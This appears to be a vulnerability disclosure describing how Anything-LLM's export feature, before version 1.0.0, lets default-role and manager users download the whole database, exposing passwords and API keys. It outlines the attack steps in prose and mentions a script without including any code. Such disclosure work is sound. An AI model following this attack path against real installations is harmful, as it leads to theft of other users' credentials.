The vulnerability arises from an export feature that improperly grants default-role and manager users the ability to download the entire database file. Despite these roles being intended to have limited permissions, the export feature circumvents these restrictions, allowing unauthorized access to sensitive information. This flaw exposes a significant risk of sensitive data leakage, including authentication credentials and API keys, which could lead to further exploitation of the system.

An attacker with default or manager user privileges initiates the attack by exploiting the export feature to download the database file. Using a crafted Python script, the attacker authenticates with their token, triggers a data export, and retrieves the exported database file. Upon accessing the database, the attacker can extract sensitive information such as usernames, passwords, and API keys, leading to unauthorized access and potential further exploitation of the system.

Users of Anything-LLM prior to version 1.0.0 are affected by this vulnerability. Specifically, the exposure of sensitive information impacts the integrity and confidentiality of the system, potentially affecting all users whose data is stored within the compromised database.